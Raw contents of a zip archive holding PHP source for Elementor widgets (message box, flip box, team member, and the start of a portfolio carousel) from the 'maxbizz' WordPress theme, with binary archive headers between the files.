			]
		);

		$this->add_control(
			'icon_font',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'type' => Controls_Manager::ICONS,
				'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fas fa-star',
					'library' => 'fa-solid',
				],
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Information Box', 'maxbizz' ),
				'label_block' => true,
			]
		);

		$this->add_control(
			'des',
			[
				'label' => 'Description',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'We help ambitious businesses like yours generate.', 'maxbizz' ),
			]
		);

		$this->end_controls_section();

		//Style
		$this->start_controls_section(
			'style_box_section',
			[
				'label' => __( 'Box', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'box_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-message-box' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'box_radius',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-message-box' => 'border-radius: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'box_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-message-box' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'accs_box_shadow',
				'selector' => '{{WRAPPER}} .ot-message-box',
				'separator' => 'before',
			]
		);

		$this->end_controls_section();
		
		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'icon_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'color: {{VALUE}};',
					'{{WRAPPER}} .icon-main svg' => 'fill: {{VALUE}};'
				],
			]
		);
		$this->add_responsive_control(
			'icon_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .content-box' => 'padding-left: calc({{SIZE}}{{UNIT}} + 46px);',
				],
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-message-box h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-message-box h6' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .ot-message-box h6',
			]
		);

		//Description
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'des_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-message-box p' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .ot-message-box p',
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
		<div class="ot-message-box">
			<div class="icon-main">
				<?php if ( ! empty( $settings['icon_font']['value'] ) ) { Icons_Manager::render_icon( $settings['icon_font'], [ 'aria-hidden' => 'true' ] ); } ?>
	        </div>
	        <div class="content-box">
	            <h6><?php echo $settings['title']; ?></h6>
	            <p><?php echo $settings['des']; ?></p>
	        </div>
	        <i class="ot-flaticon-cancel"></i>
	    </div>
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_MessageBox class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_MessageBox() );PK�8FZ�j�bc(c(*inc/backend/elementor/widgets/flip-box.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Flip Box
 */
class Maxbizz_Flip_Box extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iflip_box';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Flip Box', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-flip-box';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Flip box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Flip Box', 'maxbizz' ),
			]
		);
		$this->add_control(
	       'image_box',
	        [
	           'label' => esc_html__( 'Image Box', 'maxbizz' ),
	           'type'  => Controls_Manager::MEDIA,
				'default' => [
					'url' => Utils::get_placeholder_image_src(),
			  	],
		    ]
	    );

	    $this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'image_box_size', // Usage: `{name}_size` and `{name}_custom_dimension`, in this case `thumbnail_size` and `thumbnail_custom_dimension`.
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);

		$this->add_control(
			'number',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( '01', 'maxbizz' ),
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Client Learning Programs', 'maxbizz' ),
			]
		);

		$this->add_control(
			'des',
			[
				'label' => 'Description',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.', 'maxbizz' ),
			]
		);

		$this->add_control(
			'label_link',
			[
				'label' => 'Label Button',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( '<i class="ot-flaticon-trajectory"></i> Explore More', 'maxbizz' ),
			]
		);

		$this->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);

		$this->end_controls_section();

		/***Style***/

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		/* gereral */
		$this->add_control(
			'heading_gereral',
			[
				'label' => __( 'Gereral', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_responsive_control(
			'box_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .number-title' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-flip-box' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .number-title h4' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .number-title h4' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .number-title h4',
			]
		);

		/* number */
		$this->add_control(
			'heading_num',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		
		$this->add_control(
			'num_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .number-title span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'num_typography',
				'selector' => '{{WRAPPER}} .number-title span',
			]
		);

		$this->end_controls_section();

		//Hover
		$this->start_controls_section(
			'style_overlay_section',
			[
				'label' => __( 'Hover', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'overlay_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-flip-box .overlay' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
				'separator' => 'before',
			]
		);
		$this->add_control(
			'overlay_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-flip-box .overlay' => 'background: {{VALUE}};',
				],
			]
		);

		/* description */
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'des_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .overlay' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .overlay',
			]
		);

		/* button */
		$this->add_control(
			'heading_btn',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_responsive_control(
			'btn_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .inner > a' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .inner > a' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_hcolor',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .inner > a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'btn_typography',
				'selector' => '{{WRAPPER}} .inner > a',
				'condition' => [
					'label_link!' => '',
				],
			]
		);
	
		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();

		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'button', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'button', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'button', 'rel', 'nofollow' );
			}
		}
		$this->add_render_attribute( 'button', 'class', 'link-details' );

		?>

		<div class="ot-flip-box">
			<div class="inner-box">
				<div class="overlay flex-middle">
					<div class="inner">
						<?php if( $settings['des'] ) { echo '<p>' .$settings['des']. '</p>'; } ?>
						<?php if( $settings['label_link'] ){ echo '<a ' .$this->get_render_attribute_string( 'button' ). '>' .$settings['label_link']. '</a>'; } ?>
					</div>
				</div>
				<div class="content-box">
					<div class="number-title">
						<?php if( $settings['number'] ) { echo '<span>' .$settings['number']. '</span>'; } ?>
						<?php if( $settings['title'] ) { echo '<h4>' .$settings['title']. '</h4>'; } ?>
					</div>
					<?php echo Group_Control_Image_Size::get_attachment_image_html( $settings, 'image_box_size', 'image_box' ); ?>
				</div>
			</div>
	    </div>

	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Flip_Box class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Flip_Box() );PK�8FZ)1��>�>(inc/backend/elementor/widgets/team-1.phpnu�[���<?php 
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Team 1
 */
class Maxbizz_Team extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'imember';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Team 1', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-person';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		/**TAB_CONTENT**/
		$this->start_controls_section(
			'content_section',
			[
				'label' => esc_html__( 'Member Team', 'maxbizz' ),
			]
		);

		$this->add_control(
	       'member_image',
	        [
	            'label' => esc_html__( 'Photo', 'maxbizz' ),
	            'type'  => Controls_Manager::MEDIA,
				'default' => [
					'url' => Utils::get_placeholder_image_src(),
				]
		    ]
		);
		$this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'member_image_size',
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);

	    $this->add_control(
		    'member_name',
	      	[
	          	'label' => esc_html__( 'Name', 'maxbizz' ),
	          	'type'  => Controls_Manager::TEXTAREA,
				'default' => esc_html__( 'Peter Perish', 'maxbizz' ),
	    	]
	    );

	    $this->add_control(
		    'member_extra',
	      	[
	          	'label' => esc_html__( 'Extra/Job', 'maxbizz' ),
	          	'type'  => Controls_Manager::TEXTAREA,
	          	'default' => esc_html__( 'co-founder of company', 'maxbizz' ),
	    	]
	    );

		$repeater = new Repeater();
		$repeater->add_control(
	      	'title',
		    [
		        'label'   => esc_html__( 'Name', 'maxbizz' ),
		        'type'    => Controls_Manager::TEXT,
		        'default' => esc_html__( 'Social', 'maxbizz' ),
		    ]
	    );

        $repeater->add_control(
            'social_icon',
            [
                'label' => esc_html__( 'Icon', 'maxbizz' ),
                'type'  => Controls_Manager::ICONS,
                'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fab fa-twitter',
					'library' => 'fa-brand',
				],
            ]
        );

        $repeater->add_control(
            'social_link',
            [
                'label' => esc_html__( 'Link', 'maxbizz' ),
                'type'  => Controls_Manager::URL,
                'dynamic' => [
					'active' => true,
				],
				'placeholder' => __( 'https://', 'maxbizz' ),
				'default' => [
					'url' => 'https://', 
				],
            ]
        );

		$this->add_control(
		    'social_share',
		    [
		        'label'       => esc_html__( 'Socials', 'maxbizz' ),
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => true,
		        'default'     => [
		            [
		             	'title'       => esc_html__( 'Twitter', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.twitter.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-twitter',
							'library' => 'fa-brand',
						],
		 
		            ],
		            [
		             	'title'       => esc_html__( 'Facebook', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.facebook.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-facebook-f',
							'library' => 'fa-brand',
						],
		 
		            ],
		            [
		             	'title'       => esc_html__( 'Pinterest', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.pinterest.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-pinterest-p',
							'library' => 'fa-brand',
						],

		            ]
		        ],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{title}}}',
		    ]
		);
		$this->add_control(
			'link',
			[
				'label' => __( 'Link To Details', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://', 'maxbizz' ),
			]
		);

		$this->end_controls_section();

		/**TAB_STYLE**/
		$this->start_controls_section(
			'content_style',
			[
				'label' => esc_html__( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'text-align: {{VALUE}};',
				],
			]
		);
		
		$this->add_responsive_control(
			'padding_box',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .team-info' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->start_controls_tabs( 'tabs_box_style' );
		$this->start_controls_tab(
			'tab_bg_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);
		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background Box', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .team-info' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .ot-team',
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_bg_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);
		$this->add_control(
			'bg_hover_box',
			[
				'label' => __( 'Background Box', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team:hover .team-info' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'hover_box_shadow',
				'selector' => '{{WRAPPER}} .ot-team:hover',
			]
		);
		$this->add_control(
			'box_animation',
			[
				'label' => __( 'Hover Animation', 'maxbizz' ),
				'type' => Controls_Manager::HOVER_ANIMATION,
			]
		);
		$this->add_control(
			'bg_hover_title_color',
			[
				'label' => __( 'Title Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team:hover h6, {{WRAPPER}} .ot-team:hover h6 a' => 'color: {{VALUE}};',
				],
				'separator' => 'before',
			]
		);

		$this->add_control(
			'bg_hover_des_color',
			[
				'label' => __( 'Extra/Job Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team:hover .team-info span' => 'color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_tab();
		$this->end_controls_tabs();

		$this->end_controls_section();

		$this->start_controls_section(
			'info_style',
			[
				'label' => esc_html__( 'Info Box', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);

		$this->add_responsive_control(
			'title_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'title_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6, {{WRAPPER}} .ot-team h6 a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6 a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!'  => ''
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name'     => 'title_typography',
				'label'    => esc_html__( 'Typography', 'maxbizz' ),
				'selector' => '{{WRAPPER}} .ot-team h6',
			]
		);

		/* extra */
		$this->add_control(
			'heading_job',
			[
				'label' => __( 'Extra/Job', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_control(
			'job_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-info span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
				[
					'name'     => 'job_typography',
					'label'    => esc_html__( 'Typography', 'maxbizz' ),
					'selector' => '{{WRAPPER}} .team-info span',
				]
		);

		$this->end_controls_section();

		/* socials */
		$this->start_controls_section(
			'icon_style',
			[
				'label' => esc_html__( 'Socials', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'plus_color',
			[
				'label'     => esc_html__( 'Plus Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social > span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'plus_bg',
			[
				'label'     => esc_html__( 'Plus Background', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social > span' => 'background: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'heading_social',
			[
				'label' => __( 'Socials', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'icon_social_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 50,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_socials',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .team-social a, {{WRAPPER}} .team-social span' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'icon_social_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_social_bg',
			[
				'label'     => esc_html__( 'Background', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_hover_color',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'social_hover_bg',
			[
				'label'     => esc_html__( 'Background Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'background: {{VALUE}};',
				],
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		
		$photo = Group_Control_Image_Size::get_attachment_image_html( $settings, 'member_image_size', 'member_image' );
		$tname = $settings['member_name'];

		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'm_link', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'm_link', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'm_link', 'rel', 'nofollow' );
			}
			$photo = '<a ' .$this->get_render_attribute_string( 'm_link' ). '>' .$photo. '</a>';
			$tname = '<a ' .$this->get_render_attribute_string( 'm_link' ). '>' .$tname. '</a>';
		}

		$this->add_render_attribute( 'team-box', 'class', 'ot-team team-1' );
		if ( $settings['box_animation'] ) {
			$this->add_render_attribute( 'team-box', 'class', 'elementor-animation-' . $settings['box_animation'] );
		}

		?>

		<div <?php echo $this->get_render_attribute_string( 'team-box' ); ?>>
			<div class="team-thumb">
				<?php if( $settings['member_image']['url'] ) { echo $photo; } ?>
				<?php if ( ! empty( $settings['social_share'] ) ) : ?>
				<div class="team-social">
					<?php foreach ( $settings['social_share'] as $key => $social ) : ?>
						<?php if ( ! empty( $social['social_link'] ) ) : ?>
							<a <?php if($social['social_link']['is_external'])
							{ echo 'target="_blank"'; }else{ echo 'rel="nofollow"';}?> 
									href="<?php echo $social['social_link']['url'];?>" class="<?php echo strtolower($social['title']);?>" style="transition-delay: <?php echo ($key*50).'ms';?>">
									<?php Icons_Manager::render_icon( $social['social_icon'], [ 'aria-hidden' => 'true' ] ); ?>
							</a>
						<?php endif; ?>
					<?php endforeach; ?>
					<span class="ot-flaticon-signs"></span>
				</div>
				<?php endif; ?>
			</div>
			<div class="team-info">
				<?php if ( $settings['member_name'] ) { echo '<h6 class="tname">' .$tname. '</h6>'; } ?>
				<?php if ( $settings['member_extra'] ) { echo '<span>' .$settings['member_extra']. '</span>'; } ?>
			</div>
		</div>
	        
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Team class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Team() );PK�8FZ�����9�94inc/backend/elementor/widgets/portfolio-carousel.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Projects Carousel
 */
class Maxbizz_Portfolio_Slider extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
